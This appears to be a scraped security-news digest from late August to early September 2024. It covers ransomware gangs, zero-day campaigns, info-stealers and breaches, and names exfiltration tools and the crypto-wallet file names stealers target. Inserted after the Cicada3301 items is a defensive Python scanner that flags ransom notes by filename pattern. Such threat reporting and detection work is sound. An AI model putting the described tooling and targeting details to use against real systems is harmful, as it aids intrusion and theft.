          Autosummary: When organizations implement SaaS apps, they see a surge in third-party integrations that deliver extended functionalities, automated workflows, unified data access, etc. "


          How ransomware tactics are shifting, and what it means for your business

          exploits ransomware industry
          2024-09-03 https://www.helpnetsecurity.com/2024/09/03/tim-west-withsecure-ransomware-tactics-shifting/

          In this Help Net Security interview, Tim West, Director of Threat Intelligence and Outreach at WithSecure, discusses Ransomware-as-a-Service (RaaS) with a focus on how these cybercriminal operations are adapting to increased competition, shifting structures, and a fragmented ecosystem. West talks about the implications of these changes for targeted industries, particularly engineering and manufacturing, and examines ransomware actors’ growing reliance on dual-use tools. How has the ransomware-as-a-service (RaaS) landscape evolved? Are we seeing a shift in … More

          The post How ransomware tactics are shifting, and what it means for your business appeared first on Help Net Security.

          "

          Autosummary: The tools we found to be commonly used by RaaS actors included PDQ Connect, Action1, AnyDesk, and TeamViewer for remote access, as well as rclone, rsync, Megaupload, and FileZilla for data exfiltration. At the same time, from a defender’s perspective, the mistrust among cybercriminals is beneficial, as it likely makes them less effective, less efficient, and easier to defend against. Proprietary data and intellectual property (IP), including designs, blueprints, and trade secrets are critical to maintaining a competitive edge, and therefore lucrative assets for theft or sale. At the same time, traditional defences against ransomware encryption, such as backup strategies and network segmentation, remain important. "


          Rocinante Trojan Poses as Banking Apps to Steal Sensitive Data from Brazilian Android Users

          financial exploits latam
          2024-09-03 https://thehackernews.com/2024/09/rocinante-trojan-poses-as-banking-apps.html
          Mobile users in Brazil are the target of a new malware campaign that delivers a new Android banking trojan named Rocinante. "This malware family is capable of performing keylogging using the Accessibility Service, and is also able to steal PII from its victims using phishing screens posing as different banks," Dutch security company ThreatFabric said. "Finally, it can use all this exfiltrated "

          Autosummary: Some of the prominent targets of the malware include financial institutions such as Itaú Shop and Santander, with the phony apps masquerading as Bradesco Prime and Correios Celular, among others: Livelo Pontos (com.resgatelivelo.cash), Correios Recarga (com.correiosrecarga.android), Bratesco Prine (com.resgatelivelo.cash), and Módulo de Segurança (com.viberotion1414.app). Source code analysis of the malware has revealed that Rocinante is being internally called by the operators as Pegasus (or PegasusSpy). "


          Halliburton confirms data stolen in recent cyberattack

          ciber
          2024-09-03 https://www.bleepingcomputer.com/news/security/halliburton-confirms-data-stolen-in-recent-cyberattack/
          Oil and gas giant Halliburton has confirmed in a filing today to the Securities and Exchange Commission (SEC) that data was stolen in the recent attack linked to the RansomHub ransomware gang. [...] "

          Autosummary: "


          City of Columbus tries to silence security researcher

          government
          2024-09-03 https://www.malwarebytes.com/blog/news/2024/09/city-of-columbus-tries-to-silence-security-researcher
          The City of Columbus filed a lawsuit against a researcher for trying to inform the public about the nature of the data stolen by a ransomware group "

          Autosummary: When that didn’t render any results, Rhysida published (please note the word “published” here, it’s important) stolen data comprising 260,000 files (3.1 TB), which was almost half of what they claimed to have, on August 8, 2024. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. So, the City of Columbus decided to sue Goodwolf for alleged damages for criminal acts, invasion of privacy, negligence, and civil conversion. "


          Ping Identity strengthens security for federal agencies and government suppliers

          government
          2024-09-03 https://www.helpnetsecurity.com/2024/09/03/ping-identity-fedramp-high-offerings/

          Ping Identity announced the addition of key identity capabilities to its FedRAMP High & DoD IL5 offerings. With Ping Government Identity Cloud, federal agencies and government suppliers now have access to capabilities that enable them to boost compliance, security and experiences through modernizing identity, credential and access management. Following FedRAMP High certification, DOD Impact Level 5 (IL5) authorization, and joining with ForgeRock, Ping Government Identity Cloud now offers authorized identity capabilities for multi-factor authentication (MFA), … More

          The post Ping Identity strengthens security for federal agencies and government suppliers appeared first on Help Net Security.

          "

          Autosummary: "


          Hacktivists Exploit WinRAR Vulnerability in Attacks Against Russia and Belarus

          exploits
          2024-09-03 https://thehackernews.com/2024/09/hacktivists-exploits-winrar.html
          A hacktivist group known as Head Mare has been linked to cyber attacks that exclusively target organizations located in Russia and Belarus. "Head Mare uses more up-to-date methods for obtaining initial access," Kaspersky said in a Monday analysis of the group's tactics and tools. "For instance, the attackers took advantage of the relatively recent CVE-2023-38831 vulnerability in WinRAR, which "

          Autosummary: Another crucial component of its attack arsenal is Sliver, an open-source C2 framework, and a collection of various publicly available tools such as rsockstun, ngrok, and Mimikatz that facilitate discovery, lateral movement, and credential harvesting. "


          New Rust-Based Ransomware Cicada3301 Targets Windows and Linux Systems

          exploits ransomware Linux
          2024-09-03 https://thehackernews.com/2024/09/new-rust-based-ransomware-cicada3301.html
          Cybersecurity researchers have unpacked the inner workings of a new ransomware variant called Cicada3301 that shares similarities with the now-defunct BlackCat (aka ALPHV) operation. "It appears that Cicada3301 ransomware primarily targets small to medium-sized businesses (SMBs), likely through opportunistic attacks that exploit vulnerabilities as the initial access vector," cybersecurity "

          Autosummary: "


          U.S. oil giant Halliburton disclosed a data breach

          financial industry
          2024-09-03 https://securityaffairs.com/168002/data-breach/halliburton-data-breach.html
          U.S. oil company Halliburton disclosed a data breach following the RansomHub ransomware gang attack that occurred in August. In August, Halliburton, a major U.S. oil company, announced that a cyberattack hit its IT infrastructure, particularly impacting operations at its Houston offices. Halliburton Company is an American multinational corporation and the world’s second largest oil service company which is […] "

          Autosummary: “The Company remains subject to various risks due to the incident, including the adequacy of processes during the period of disruption, diversion of management’s attention, potential litigation, changes in customer behavior, and regulatory scrutiny.” continues the document. "


          London’s city transport hit by cybersecurity incident

          government ciber
          2024-09-03 https://www.malwarebytes.com/blog/news/2024/09/londons-city-transport-hit-by-cybersecurity-incident
          Transport for London (TfL) is apparently fighting a cybersecurity incident but is rather sparing in providing details "

          Autosummary: The contactless website is used to purchase online tickets, upgrade travelcards (Oystercards), check travel history, and request refunds. "


          FTC: Over $110 million lost to Bitcoin ATM scams in 2023

          financial
          2024-09-03 https://www.bleepingcomputer.com/news/security/ftc-americans-lost-over-110-million-to-bitcoin-atm-scams-in-2023/
          The U.S. Federal Trade Commission (FTC) has reported a massive increase in losses to Bitcoin ATM scams, nearly ten times the amount from 2020 and reaching over $110 million in 2023. [...] "

          Autosummary: Additionally, never withdraw cash in response to unexpected calls or messages, and never believe anyone who says you need to use a Bitcoin ATM, buy gift cards, or move money to protect your bank account or fix a problem. "


          Business services giant CBIZ discloses customer data breach

          financial
          2024-09-02 https://www.bleepingcomputer.com/news/security/business-services-giant-cbiz-discloses-customer-data-breach/
          CBIZ Benefits & Insurance Services (CBIZ) has disclosed a data breach that involves unauthorized access to client information stored in specific databases. [...] "

          Autosummary: "


          Ransomware crisis deepens as attacks and payouts rise

          exploits
          2024-09-02 https://www.helpnetsecurity.com/2024/09/02/ransomware-crisis-attacks-payouts/

          During the second quarter, new ransomware groups, including PLAY, Medusa, RansomHub, INC Ransom, BlackSuit, and some additional lesser-known factions, led a series of attacks that eclipsed the first quarter of this year by 16% and the second quarter of 2023 by 8%, according to Corvus Insurance. These new threat actors emerged following the international law enforcement’s takedown of LockBit and BlackCat. Ransomware: Most frequently targeted industries (Source: Corvus Insurance). Ransomware demands and payouts: Based on … More

          The post Ransomware crisis deepens as attacks and payouts rise appeared first on Help Net Security.

          "

          Autosummary: During the second quarter, new ransomware groups, including PLAY, Medusa, RansomHub, INC Ransom, BlackSuit, and some additional lesser-known factions, led a series of attacks that eclipsed the first quarter of this year by 16% and the second quarter of 2023 by 8%, according to Corvus Insurance. "


          RansomHub Ransomware Group Targets 210 Victims Across Critical Sectors

          exploits ransomware
          2024-09-02 https://thehackernews.com/2024/09/ransomhub-ransomware-group-targets-210.html
Threat actors linked to the RansomHub ransomware group encrypted and exfiltrated data from at least 210 victims since its inception in February 2024, the U.S. government said. The victims span various sectors, including water and wastewater, information technology, government services and facilities, healthcare and public health, emergency services, food and agriculture, financial services,

Autosummary: The victims span various sectors, including water and wastewater, information technology, government services and facilities, healthcare and public health, emergency services, food and agriculture, financial services, commercial facilities, critical manufacturing, transportation, and communications critical infrastructure.


          Webinar: Learn to Boost Cybersecurity with AI-Powered Vulnerability Management

          exploits ciber
          2024-09-02 https://thehackernews.com/2024/09/webinar-learn-to-boost-cybersecurity.html
The world of cybersecurity is in a constant state of flux. New vulnerabilities emerge daily, and attackers are becoming more sophisticated. In this high-stakes game, security leaders need every advantage they can get. That's where Artificial Intelligence (AI) comes in. AI isn't just a buzzword; it's a game-changer for vulnerability management. AI is poised to revolutionize vulnerability

Autosummary: Key Takeaways from this Must-Attend Webinar: AI Innovations: Get an in-depth look at how AI is changing the face of vulnerability management.


          Lockbit gang claims the attack on the Toronto District School Board (TDSB)

          ransomware
          2024-09-02 https://securityaffairs.com/167934/cyber-crime/lockbit-ransomware-toronto-district-school-board.html
The Toronto District School Board (TDSB) confirmed that student information was compromised in the June Lockbit ransomware attack. The Toronto District School Board (TDSB) confirmed that students’ information was compromised following a ransomware attack that was discovered in June. The TDSB is the largest school board in Canada with 582 schools and about 235,000 students. In […]

Autosummary: “LockBit also claims to have re-breached Bridgestone Americas and claims Albany Bank, PKF Australia, HP Hood…” (Dominic Alvieri, @AlvieriD, August 29, 2024). At the end of July, two foreign nationals, Ruslan Magomedovich Astamirov and Mikhail Vasiliev, pleaded guilty in Newark federal court for their roles in the LockBit ransomware operation.


          A new variant of Cicada ransomware targets VMware ESXi systems

          exploits ransomware
          2024-09-02 https://securityaffairs.com/167897/cyber-crime/a-new-variant-of-cicada-ransomware-targets-vmware-esxi-systems.html
A new ransomware-as-a-service (RaaS) operation called Cicada3301 has emerged in the threat landscape and already targeted tens of companies. Cicada3301 is a new ransomware-as-a-service (RaaS) operation that appeared in the threat landscape. The group appears to be very active and already listed 23 victims on its extortion portal since mid-June. The following image shows the […]

Autosummary: Similarities between Cicada3301 and BlackCat/ALPHV: both are written in Rust; both use ChaCha20 for encryption; both use almost identical commands to shut down VMs and remove snapshots; both use --ui command parameters to provide graphical output on encryption; both use the same file-naming convention, except that “RECOVER-<ransomware extension>-FILES.txt” becomes “RECOVER-<ransomware extension>-DATA.txt”. [Figure: How the key parameter is used to decrypt the ransomware note] The initial attack by the Cicada3301 group began with the use of stolen or brute-forced credentials to log in via ScreenConnect. (Pierluigi Paganini, September 02, 2024)


Top Brazil court upholds ban of Musk's X

          latam
          2024-09-02 https://www.bbc.com/news/articles/crkmpe53l6jo
A majority of justices has voted in favour of upholding the suspension which has seen X blocked in Brazil.

Autosummary: Reacting to the decision to ban X, Mr Musk had earlier said: "Free speech is the bedrock of democracy and an unelected pseudo-judge in Brazil is destroying it for political purposes."


          Transport for London (TfL) is dealing with an ongoing cyberattack

          ciber
          2024-09-02 https://securityaffairs.com/167946/hacking/transport-for-london-tfl-ongoing-cyberattack.html
Transport for London (TfL) is investigating an ongoing cyberattack; however, there is no evidence that customer information was compromised. Transport for London (TfL) is investigating an ongoing cyberattack. However, TfL stated that there is no evidence that customer information was compromised during the incident. “We are currently dealing with an ongoing cyber security incident. At present, there is no […]

Autosummary: Pierluigi Paganini, September 02, 2024. Transport for London (TfL) is investigating an ongoing cyberattack; however, there is no evidence that customer information was compromised.


Young workers drive South Africa's video games industry

          industry
          2024-09-02 https://www.bbc.com/news/articles/c6ppjq0zz1go
South Africa has a small but thriving video games industry, helped by plenty of young workers.

Autosummary: “These days we’ve got a truly diverse cross section of South Africa coming to the event, all ages, races, and genders,” says rAge project director, Michael James. “Though on the surface things may seem to be moving slowly right now, when a lot of these new projects, teams, and companies reveal themselves, there is going to be a massive wave of South African content in the industry.” [Image credit: Carina Cristovao; caption: Rodwin Malinga sees a "massive wave" of South African games content coming] As well as having a new wave of game developers, South Africa is a growing market for games themselves, points out Chris Beer, an analyst at GWI.


          Week in review: SonicWall critical firewalls flaw fixed, APT exploits WPS Office for Windows RCE

          exploits
          2024-09-01 https://www.helpnetsecurity.com/2024/09/01/week-in-review-sonicwall-critical-firewalls-flaw-fixed-apt-exploits-wps-office-for-windows-rce/

          Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: SonicWall patches critical flaw affecting its firewalls (CVE-2024-40766) SonicWall has patched a critical vulnerability (CVE-2024-40766) in its next-gen firewalls that could allow remote attackers unauthorized access to resources and, in specific conditions, to crash the appliances. Nuclei: Open-source vulnerability scanner Nuclei is a fast and customizable open-source vulnerability scanner powered by YAML-based templates. APT group exploits WPS Office for Windows … More


Autosummary: Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: SonicWall patches critical flaw affecting its firewalls (CVE-2024-40766) SonicWall has patched a critical vulnerability (CVE-2024-40766) in its next-gen firewalls that could allow remote attackers unauthorized access to resources and, in specific conditions, to crash the appliances. Why ransomware attackers target Active Directory In this Help Net Security video, Craig Birch, Technology Evangelist and Principal Security Engineer at Cayosoft, discusses the rise of ransomware attacks, why attackers often target Microsoft Active Directory and best practices to limit the impact of such attacks.


          SECURITY AFFAIRS MALWARE NEWSLETTER – ROUND 9

          exploits
          2024-09-01 https://securityaffairs.com/167872/malware/security-affairs-malware-newsletter-round-9.html
Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape: Unveiling “sedexp”: A Stealthy Linux Malware Exploiting udev Rules; Malware infiltrates Pidgin messenger’s official plugin repository; HZ Rat backdoor for macOS attacks users of China’s DingTalk and WeChat; BlackByte blends tried-and-true tradecraft with newly disclosed vulnerabilities […]



          Cicada3301 ransomware’s Linux encryptor targets VMware ESXi systems

          exploits ransomware Linux
          2024-09-01 https://www.bleepingcomputer.com/news/security/cicada3301-ransomwares-linux-encryptor-targets-vmware-esxi-systems/
A new ransomware-as-a-service (RaaS) operation named Cicada3301 has already listed 19 victims on its extortion portal, as it quickly attacked companies worldwide. [...]

Autosummary: It should be noted that BlackCat/ALPHV encryptors also used random seven-character extensions and a ransom note named "RECOVER-[extension]-FILES.txt." [Figure: Cicada3301 ransom note (Source: BleepingComputer)] The ransomware's operators can set a sleep parameter to delay the encryptor's execution, potentially to evade immediate detection. [Figure: Cicada3301 ransomware operator seeking affiliates on RAMP forums (Source: Truesec)] Like other ransomware operations, Cicada3301 conducts double-extortion tactics where they breach corporate networks, steal data, and then encrypt devices.


          Linux version of new Cicada ransomware targets VMware ESXi servers

          exploits ransomware Linux
          2024-09-01 https://www.bleepingcomputer.com/news/security/linux-version-of-new-cicada-ransomware-targets-vmware-esxi-servers/
A new ransomware-as-a-service (RaaS) operation named Cicada3301 has already listed 19 victims on its extortion portal, as it quickly attacked companies worldwide. [...]

Autosummary: It should be noted that BlackCat/ALPHV encryptors also used random seven-character extensions and a ransom note named "RECOVER-[extension]-FILES.txt." [Figure: Cicada3301 ransom note (Source: BleepingComputer)] The ransomware's operators can set a sleep parameter to delay the encryptor's execution, potentially to evade immediate detection. [Figure: Cicada3301 ransomware operator seeking affiliates on RAMP forums (Source: Truesec)] Like other ransomware operations, Cicada3301 conducts double-extortion tactics where they breach corporate networks, steal data, and then encrypt devices.
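The Cicada3301 items above (this BleepingComputer pair and the Security Affairs item dated 2024-09-02) describe one concrete, checkable artifact: encrypted files get a random seven-character extension, and a note named RECOVER-<extension>-FILES.txt (the BlackCat/ALPHV form) or RECOVER-<extension>-DATA.txt (the Cicada3301 form) is dropped beside them. The Python scanner below is an added example, not code from any of the articles, from Truesec or from BleepingComputer: it walks a list of paths, finds notes that follow that convention, and counts sibling files carrying the note's extension, so an analyst can tell a real hit from a stray file. It assumes the extension is alphanumeric (the articles do not say) and runs over a constructed path list rather than a live datastore.

```python
import re
from collections import Counter, defaultdict
from pathlib import PurePosixPath

# Naming convention reported for BlackCat/ALPHV and Cicada3301: encrypted files
# carry a random seven-character extension, and a note named
# RECOVER-<extension>-FILES.txt (BlackCat/ALPHV) or RECOVER-<extension>-DATA.txt
# (Cicada3301) is dropped beside them. Assumption: the extension is alphanumeric.
NOTE_RE = re.compile(r"^RECOVER-(?P<ext>[A-Za-z0-9]{7})-(?P<kind>FILES|DATA)\.txt$")
FAMILY_HINT = {"FILES": "BlackCat/ALPHV-style note", "DATA": "Cicada3301-style note"}

# Constructed sample, not real incident data: two hit directories, one decoy
# note whose "extension" has the wrong length, and untouched files.
SAMPLE_PATHS = [
    "/vmfs/volumes/ds1/vm1/vm1.vmdk.k3x9p2q",
    "/vmfs/volumes/ds1/vm1/vm1.vmx.k3x9p2q",
    "/vmfs/volumes/ds1/vm1/RECOVER-k3x9p2q-DATA.txt",
    "/vmfs/volumes/ds1/vm2/vm2.vmdk",
    "/home/admin/RECOVER-notes-FILES.txt",
    "/srv/share/report.docx.a1b2c3d",
    "/srv/share/RECOVER-a1b2c3d-FILES.txt",
]


def scan_paths(paths):
    """Group paths by directory and return one finding per ransom note,
    with the number of sibling files that carry the note's extension."""
    by_dir = defaultdict(list)
    for p in paths:
        pp = PurePosixPath(p)
        by_dir[str(pp.parent)].append(pp.name)

    findings = []
    for directory, names in by_dir.items():
        # How many files in this directory end in each extension.
        ext_counts = Counter(PurePosixPath(n).suffix.lstrip(".") for n in names)
        for name in names:
            m = NOTE_RE.match(name)
            if not m:
                continue
            ext = m.group("ext")
            findings.append({
                "note": f"{directory}/{name}",
                "extension": ext,
                "hint": FAMILY_HINT[m.group("kind")],
                "encrypted_siblings": ext_counts.get(ext, 0),
            })
    return findings


def findings_by_extension(paths):
    """Triage view keyed by the random extension found in each note."""
    return {f["extension"]: f for f in scan_paths(paths)}


if __name__ == "__main__":
    for f in scan_paths(SAMPLE_PATHS):
        print(f"{f['hint']}: {f['note']} "
              f"({f['encrypted_siblings']} sibling files with .{f['extension']})")
```

In practice the path list would come from something like `find /vmfs/volumes -type f` on the ESXi host or a file-server inventory. A note with zero matching siblings is still worth an alert (the encryptor may have been interrupted, or the note may sit at a volume root), which is why the count is reported rather than used as a filter.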


          North Korean Hackers Deploy FudModule Rootkit via Chrome Zero-Day Exploit

          exploits
          2024-08-31 https://thehackernews.com/2024/08/north-korean-hackers-deploy-fudmodule.html
A recently patched security flaw in Google Chrome and other Chromium web browsers was exploited as a zero-day by North Korean actors in a campaign designed to deliver the FudModule rootkit. The development is indicative of the persistent efforts made by the nation-state adversary, which had made a habit of incorporating rafts of Windows zero-day exploits into its arsenal in recent months.

Autosummary: Microsoft, which detected the activity on August 19, 2024, attributed it to a threat actor it tracks as Citrine Sleet (formerly DEV-0139 and DEV-1222), which is also known as AppleJeus, Labyrinth Chollima, Nickel Academy, and UNC4736.


          North Korea-linked APT Citrine Sleet exploit Chrome zero-day to deliver FudModule rootkit

          exploits
          2024-08-31 https://securityaffairs.com/167848/breaking-news/north-korea-linked-apt-exploited-chrome-zero-day-cve-2024-7971.html
North Korea-linked APT exploited the recently patched Google Chrome zero-day CVE-2024-7971 to deploy the FudModule rootkit. The North Korea-linked group Citrine Sleet (aka AppleJeus, Labyrinth Chollima, UNC4736, Hidden Cobra) has exploited the recently patched Google Chrome zero-day CVE-2024-7971 (CVSS score 8.8) to deploy the FudModule rootkit, Microsoft states. Microsoft researchers linked the attacks with medium confidence to Citrine […]

Autosummary: Pierluigi Paganini, August 31, 2024. North Korea-linked APT exploited the recently patched Google Chrome zero-day CVE-2024-7971 to deploy the FudModule rootkit.


Musk's X banned in Brazil after disinformation row

          latam
          2024-08-31 https://www.bbc.com/news/articles/c5y3rnl5qv3o
The social media giant says it refused to comply with a judge's order to appoint a legal representative.

Autosummary: "Soon, we expect Judge Alexandre de Moraes will order X to be shut down in Brazil – simply because we would not comply with his illegal orders to censor his political opponents," the post said.


          GitHub comments abused to push password stealing malware masked as fixes

          exploits
          2024-08-31 https://www.bleepingcomputer.com/news/security/github-comments-abused-to-push-password-stealing-malware-masked-as-fixes/
GitHub is being abused to distribute the Lumma Stealer information-stealing malware as fake fixes posted in project comments. [...]

Autosummary: The malware can also steal cryptocurrency wallets, private keys, and text files with names like seed.txt, pass.txt, ledger.txt, trezor.txt, metamask.txt, bitcoin.txt, words, wallet.txt, *.txt, and *.pdf, as these are likely to contain private crypto keys and passwords.


          A macro look at the most pressing cybersecurity risks

          ciber
          2024-08-30 https://www.helpnetsecurity.com/2024/08/30/forescout-2024h1-threat-review/

          Forescout’s 2024H1 Threat Review is a new report that reviews the current state of vulnerabilities, threat actors, and ransomware attacks in the first half of 2024 and compares them to H1 2023. “Attackers are looking for any weak point to breach IT, IoT, and OT devices, and organizations that don’t know what they have connected to their networks or if it’s secured are being caught flat-footed,” said Barry Mainz, Forescout CEO. “To mitigate these extensive … More




          Accenture expands partnership with Google Cloud to boost AI adoption and cybersecurity

          ciber
          2024-08-30 https://www.helpnetsecurity.com/2024/08/30/accenture-google-cloud-ai-adoption/

          Accenture and Google Cloud announced that their strategic alliance is advancing solutions for enterprise clients and seeing strong momentum across industries in two critical and related areas: GenAI and cybersecurity. As part of the announcement today, the two companies are increasing their investments in services that support businesses through every stage of their GenAI projects, including providing the expertise to determine optimal use cases, piloting projects for strategic innovation and deploying the engineering prowess needed … More


Autosummary: Gabriel Ferreira, CEO, Banco BV, said, “The GenCore project, developed by Banco BV, Accenture, and Google Cloud, uses AI to create hyper-personalized interactions with customers, making communication 80% faster and 100 times more personalized.” “Accenture’s decade-long partnership with Google Cloud is helping our clients across industries accelerate and scale their use of GenAI as a catalyst for reinvention, to strengthen cybersecurity, and create long-term value faster,” said Julie Sweet, CEO, Accenture.


          SANS Institute Unveils Critical Infrastructure Strategy Guide for 2024: A Call to Action for Securing ICS/OT Environments

          industry
          2024-08-30 https://thehackernews.com/2024/08/sans-institute-unveils-critical.html
          A comprehensive guide authored by Dean Parsons emphasizes the growing need for specialized ICS security measures in the face of rising cyber threats. With a staggering 50% increase in ransomware attacks targeting industrial control systems (ICS) in 2023, the SANS Institute is taking decisive action by announcing the release of its essential new strategy guide, "ICS Is the Business: Why Securing "

Autosummary: "These are the attacks that keep security CSOs, VP of Engineering and others responsible for ICS cyber defense, safety, and risk management, up at night," Parsons notes.


          New Cyberattack Targets Chinese-Speaking Businesses with Cobalt Strike Payloads

          ciber
          2024-08-30 https://thehackernews.com/2024/08/new-cyberattack-targets-chinese.html
Chinese-speaking users are the target of a "highly organized and sophisticated attack" campaign that is likely leveraging phishing emails to infect Windows systems with Cobalt Strike payloads. "The attackers managed to move laterally, establish persistence and remain undetected within the systems for more than two weeks," Securonix researchers Den Iuzvyk and Tim Peck said in a new report. The

Autosummary: The covert campaign, codenamed SLOW#TEMPEST and not attributed to any known threat actor, commences with malicious ZIP files that, when unpacked, activate the infection chain, leading to the deployment of the post-exploitation toolkit on compromised systems.


          Atlassian Confluence Vulnerability Exploited in Crypto Mining Campaigns

          exploits
          2024-08-30 https://thehackernews.com/2024/08/atlassian-confluence-vulnerability.html
Threat actors are actively exploiting a now-patched, critical security flaw impacting the Atlassian Confluence Data Center and Confluence Server to conduct illicit cryptocurrency mining on susceptible instances. "The attacks involve threat actors that employ methods such as the deployment of shell scripts and XMRig miners, targeting of SSH endpoints, killing competing crypto mining processes,



          Cyberattackers Exploit Google Sheets for Malware Control in Global Espionage Campaign

          exploits ciber
          2024-08-30 https://thehackernews.com/2024/08/cyberattackers-exploit-google-sheets.html
Cybersecurity researchers have uncovered a novel malware campaign that leverages Google Sheets as a command-and-control (C2) mechanism. The activity, detected by Proofpoint starting August 5, 2024, impersonates tax authorities from governments in Europe, Asia, and the U.S., with the goal of targeting over 70 organizations worldwide by means of a bespoke tool called Voldemort that's equipped to

Autosummary: Targeted sectors include insurance, aerospace, transportation, academia, finance, technology, industrial, healthcare, automotive, hospitality, energy, government, media, manufacturing, telecom, and social benefit organizations.


          New Malware Masquerades as Palo Alto VPN Targeting Middle East Users

          exploits
          2024-08-30 https://thehackernews.com/2024/08/new-malware-masquerades-as-palo-alto.html
Cybersecurity researchers have disclosed a new campaign that potentially targets users in the Middle East through malware that disguises itself as the Palo Alto Networks GlobalProtect virtual private network (VPN) tool. "The malware can execute remote PowerShell commands, download and exfiltrate files, encrypt communications, and bypass sandbox solutions, representing a significant threat to



          New Voldemort malware abuses Google Sheets to store stolen data

          exploits
          2024-08-30 https://www.bleepingcomputer.com/news/security/new-voldemort-malware-abuses-google-sheets-to-store-stolen-data/
A campaign that started on August 5, 2024, is spreading a previously undocumented malware named "Voldemort" to organizations worldwide, impersonating tax agencies from the U.S., Europe, and Asia. [...]

Autosummary: [Figure: Request to receive access token from Google (Source: Proofpoint)] Voldemort uses Google's API with an embedded client ID, secret, and refresh token to interact with Google Sheets, which are stored in its encrypted configuration. Abuse of Google Sheets: Voldemort is a C-based backdoor that supports a wide range of commands and file management actions, including exfiltration, introducing new payloads into the system, and file deletion.


          North Korean hackers exploit Chrome zero-day to deploy rootkit

          exploits
          2024-08-30 https://www.bleepingcomputer.com/news/security/north-korean-hackers-exploit-chrome-zero-day-to-deploy-rootkit/
North Korean hackers have exploited a recently patched Google Chrome zero-day (CVE-2024-7971) to deploy the FudModule rootkit after gaining SYSTEM privileges using a Windows Kernel exploit. [...]

Autosummary: "In early June, Gen Threat Labs identified Diamond Sleet exploiting this vulnerability in an attack employing the FudModule rootkit, which establishes full standard user-to-kernel access, advancing from the previously seen admin-to-kernel access."


          Researcher sued for sharing data stolen by ransomware with media

          exploits ransomware
          2024-08-30 https://www.bleepingcomputer.com/news/security/researcher-sued-for-sharing-data-stolen-by-ransomware-with-media/
The City of Columbus, Ohio, has filed a lawsuit against security researcher David Leroy Ross, aka Connor Goodwolf, accusing him of illegally downloading and disseminating data stolen from the City's IT network and leaked by the Rhysida ransomware gang. [...]

Autosummary: On the same day, Rhysida ransomware claimed responsibility for the attack, alleging they stole 6.5 TB of databases, including employee credentials, server dumps, city video camera feeds, and other sensitive information.


          Iranian cybercriminals are targeting WhatsApp users in spear phishing campaign

          financial ciber
          2024-08-30 https://www.malwarebytes.com/blog/news/2024/08/iranian-cybercriminals-are-targeting-whatsapp-users-in-spear-phishing-campaign
Iranian spies posing as technical support agents contacted targeted individuals in Israel, Palestine, Iran, the UK, and the US on WhatsApp.

Autosummary: Other names for this group (depending on the vendor) are APT42, Storm-2035, Charming Kitten, Damselfly, Mint Sandstorm, TA453, and Yellow Garuda.


          South Korea-linked group APT-C-60 exploited a WPS Office zero-day

          exploits
          2024-08-30 https://securityaffairs.com/167825/hacking/apt-c-60-wps-office-zero-day.html
South Korea-linked group APT-C-60 exploited a zero-day in the Windows version of WPS Office to target East Asian countries. South Korea-linked group APT-C-60 exploited a zero-day, tracked as CVE-2024-7262, in the Windows version of WPS Office to deploy the SpyGlace backdoor on the systems of targets in East Asia. WPS Office is a comprehensive office […]

Autosummary: Pierluigi Paganini, August 30, 2024. South Korea-linked group APT-C-60 exploited a zero-day in the Windows version of WPS Office to target East Asian countries.


          Threat actors exploit Atlassian Confluence bug in cryptomining campaigns

          exploits
          2024-08-30 https://securityaffairs.com/167813/cyber-crime/atlassian-confluence-data-center-confluence-server-cryptocurrency-mining-campaigns.html
Threat actors are actively exploiting a critical flaw in the Atlassian Confluence Data Center and Confluence Server in cryptocurrency mining campaigns. The critical vulnerability CVE-2023-22527 (CVSS score 10.0) in the Atlassian Confluence Data Center and Confluence Server is being actively exploited for cryptojacking campaigns. The vulnerability is a template injection vulnerability that can allow remote […]

Autosummary: Pierluigi Paganini, August 30, 2024. Threat actors are actively exploiting a critical flaw in the Atlassian Confluence Data Center and Confluence Server in cryptocurrency mining campaigns.


          Russia-linked APT29 reused iOS and Chrome exploits previously developed by NSO Group and Intellexa

          exploits
          2024-08-30 https://securityaffairs.com/167797/apt/apt29-nso-group-and-intellexa-mobile-exploits.html
Russia-linked APT29 group was spotted reusing iOS and Chrome exploits previously developed by surveillance firms NSO Group and Intellexa. Google TAG (Threat Analysis Group) researchers observed the Russia-linked group APT29 (aka SVR group, BlueBravo, Cozy Bear, Nobelium, Midnight Blizzard, and The Dukes) using exploits previously used by surveillance software vendors NSO Group and Intellexa. The circumstance suggests that the nation-state actors […]

Autosummary: Google TAG (Threat Analysis Group) researchers observed the Russia-linked group APT29 (aka SVR group, BlueBravo, Cozy Bear, Nobelium, Midnight Blizzard, and The Dukes). In July 2024, the site mfa.gov.mn was compromised a third time, redirecting Android Chrome users to track-adv.com to exploit CVE-2024-5274 and CVE-2024-4671, deploying a Chrome information-stealing payload.


          Fugitive Italian kidnapper arrested in Argentina

          latam
          2024-08-30 https://www.bbc.com/news/articles/cd6yzw30gl1o
Police arrest a man wanted in Italy for decades for a kidnapping carried out by the Red Brigades.



          Why ransomware attackers target Active Directory

          exploits ransomware
          2024-08-29 https://www.helpnetsecurity.com/2024/08/29/why-ransomware-attackers-target-active-directory-video/

Ransomware attacks have surged 78% year-over-year, affecting various sectors and organizations and significantly impacting supply chains. In this Help Net Security video, Craig Birch, Technology Evangelist and Principal Security Engineer at Cayosoft, discusses the rise of ransomware attacks, why attackers often target Microsoft Active Directory and best practices to limit the impact of such attacks. Microsoft Active Directory, the core identity and access system in over 90% of enterprises, has become a prime target for … More




          Crypto scammers who hacked McDonald’s Instagram account say they stole $700,000

          financial
          2024-08-29 https://www.bitdefender.com/blog/hotforsecurity/crypto-scammers-who-hacked-mcdonalds-instagram-account-say-they-stole-700-000/
Hackers who seized control of the official Instagram account of McDonald's claim that they managed to steal US $700,000 from unsuspecting investors by promoting a fake cryptocurrency. Read more in my article on the Hot for Security blog.



          RISCPoint RADAR provides real-time vulnerability detection across multiple attack surfaces

          exploits
          2024-08-29 https://www.helpnetsecurity.com/2024/08/29/riscpoint-radar/

          RISCPoint Advisory Group launched RADAR, an all-in-one cybersecurity platform. Combining continuous threat discovery with expert-led Penetration Testing as a Service (PTaaS), RADAR represents a significant leap forward in proactive security and risk management. RADAR leverages artificial intelligence to provide real-time vulnerability detection across multiple attack surfaces. The platform offers continuous scanning and on-demand penetration testing by certified ethical hackers, ensuring comprehensive security assessments and compliance reporting. “With the ever-evolving threat landscape and continued focus on … More




          Russian APT29 hackers use iOS, Chrome exploits created by spyware vendors

          exploits rusia-ucrania
